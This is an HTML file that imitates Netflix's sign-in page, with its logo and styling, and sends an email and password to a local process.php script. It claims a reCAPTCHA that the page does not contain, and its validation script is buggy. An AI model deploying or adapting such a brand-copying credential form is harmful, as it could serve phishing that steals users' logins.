<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="">
  <title>Netflix LogIn</title>
  <link rel="icon" href="NetflixTitle.png" type="image/icon type">
  <style>
    *{
      margin: 0;
      padding: 0;
      font-family: 'Arial', sans-serif;
      box-sizing: border-box;
    }
    body{
      background: #000;
      color: #fff;
    }
    
    .banner{
      width: 100%;
      height: 100vh;
      background-image: linear-gradient(rgba(0,0,0,0.7),rgba(0,0,0,0.4),rgba(0,0,0,0.7)), url(NetflixBackground.png);
      background-position: center;
      background-size: cover;
      padding: 10px 8%;
      position: relative;
    }
    nav{
      display: flex;
      align-items: center;
      justify-content: space-between;
      padding: 0;
    }
    .logo{
      width: 150px;
      cursor: pointer;
    }
    .container{ 
      display: flexbox;
      flex-basis: 0;
      padding: 100px 70px 50px;
      margin-left: 400px;
      margin-right: 400px;
      background-color: rgba(0, 0, 0, 0.6);
      background-size: 40px;
      border-radius: 7px;
    }
    .form{
      border: 3px solid #f1f1f1;
    }
    input[type=text], input[type=password]{
      width: 100%;
      padding: 12px 20px;
      margin: 8px 0;
      display: inline-block;
      border-radius: 5px;
      box-sizing: border-box;
      background-color: rgb(67, 67, 67);
    }
    ::placeholder{
      color: #c2c1c1;
      opacity: 1;
    }
    .container .hidden h2{
      text-align: left;
      margin-top: 0px;
      margin-bottom: 5px;
      font-size: 30px;
      font-weight: 200;
    }
    #signIn{
      border: 0;
      border-radius: 3px;
      border-color: white;
      background-color: rgb(255, 0, 0);
      color: white;
      width: 100%;
      padding: 12px 20px;
      font-size: 16px;
      font-weight: 600;
      border-radius: 4px;
      margin-left: 0px;
      margin-top: 35px;
      cursor: pointer;
    }
    input[type=checkbox]{
      width: 10%;
      margin: 10px 0px;
      font-size: 10px;
      font-weight: 100;
    }
    .banner .container a {
        text-decoration: none;
        color: #908b8b; 
        font-size: 14px;
        margin-left: 130px;
    }
    .banner .container a:hover{
      text-decoration: underline;
    }
    p{
      margin-top: 20px;
      font-size: 16px;
      margin-left: 10px;
      text-decoration: none;
      color: #908b8b;
    }
    .banner .container p a{
      text-decoration: none;
      color: #fcfbfb; 
      font-size: 14px;
      margin-left: 0px;
    }
    .banner .container .learnMore{
      text-decoration: none;
      color: #001aff; 
      font-size: 14px;
      margin-left: 0px;
    }
  
  </style>
</head>
<body>
  
  <div class="banner">
    <nav>
      <img src="NetflixLogo.png" class="logo">
      </nav>

      <div class="container">
        <div id="signInPage" class="hidden">
          <h2>Sign In</h2>
          <form name="myform" method="post" action="process.php" onsubmit="return validateform()" >
            <input type="text" id="username" name="username" placeholder="Email or phone number" required>
            <br>
            <input type="password" id="password" name="password" placeholder="Password">
            <br>
            <button type="submit" id="signIn" onclick="signIn()">Sign In</button>
            <br>
            <input type="checkbox" id="checkbox">Remember me
            <a href="#">Need help?</a> 
          </form>
            <p>New to Netflix? <a href="#">Sign up now.</a></p>
            <p>Sign in is protected by Google reCAPTCHA to ensure you’re not a bot. <a href="#" id="learnMore">Learn more.</a></p>
        </div>
    </div>
  </div>

  <script> 
    function validateform(){  
    var name=document.myform.name.value;  
    var password=document.myform.password.value;  
      
    if (username==null || username==""){  
      alert("Name can't be blank");  
      return false;  
    }else if(password.length<6){  
      alert("Password must be at least 6 characters long.");  
      return false;  
      }  
    }  
  </script>
  
</body>
</html>